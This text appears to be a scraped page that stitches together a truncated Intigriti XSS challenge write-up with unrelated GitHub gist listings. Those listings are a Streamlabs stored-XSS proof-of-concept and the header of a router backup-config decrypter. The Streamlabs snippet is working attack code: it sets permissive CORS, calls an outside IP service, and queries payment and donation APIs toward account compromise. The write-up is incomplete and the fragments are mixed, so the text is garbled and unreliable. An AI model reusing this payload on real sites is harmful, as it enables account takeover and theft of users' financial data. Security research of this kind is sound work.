
Hey again (Inti)griti, hope y'all are doing well. Thanks for the challenge as usual.

Vulnerability

The main vulnerability is a very limited XSS on line 41, whereby arbitrary data from the r URL parameter is appended to the DOM as follows ({url} being the injection point).

If you're not being redirected, click <a href=${url}>here</a>

However, it is limited by two checks in place.

  1. Every single property in both the window and document objects is checked for the keyword javascript. If found, the property is deleted entirely, leaving it undefined (and possibly causing runtime errors). [lines 5-11]

Proof of Concept / description

The attacker needs to give the victim a malicious link that they control in order to exploit the vulnerability.

Live PoC: ██████████

Code I used

<body></body>
@NRockhouse
NRockhouse / script.js.php
Last active January 29, 2021 19:41
Streamlabs: Stored XSS in donation page leading to account compromise - Proof-of-Concept (PoC) scripts. Read more: https://blog.rockhouse.dev/2017/12/31/streamlabs-stored-xss-in-donation-page-leading-to-account-compromise-and-my-first-reward/
<?php header("Access-Control-Allow-Origin: " . $_SERVER['HTTP_ORIGIN']);
header("Content-Type: text/plain; charset=UTF-8"); ?>
this.style.display = "none";
alert("StreamLabs.Stored.XSS.Vulnerability-Cheat.Activated!-Alert");
var getLinks = ["https://api.ipify.org", "/api/v5/payment/status", "/api/v5/donation/all"];
var msg = "";
var xhr = new XMLHttpRequest();
var xsrfToken = "";
xhr.open("GET", "https://api.ipify.org", false);
xhr.send();
@NRockhouse
NRockhouse / TM-Innacomm-ADSL-MARITIME-W3410N-ConfigFileDecrypt.py
Last active January 10, 2018 14:24
Telekom Malaysia (TM) Innacomm ADSL-MARITIME-W3410N Router Backup Configuration File Decrypter & Encrypter
#!/usr/bin/python
# =============================================================
# Telekom Malaysia (TM) Innacomm ADSL-MARITIME-W3410N
# Router Configuration Settings Backup File Decryption Tool
#
# This Python script is used to decrypt the backup configuration
# settings file of the TM Innacomm ADSL-MARITIME-W3410N (which
# is apparently a rebranded PROLiNK ADSL2 PRS1241B modem according
# to blog.fpmurphy.com). The usage is pretty self-explanatory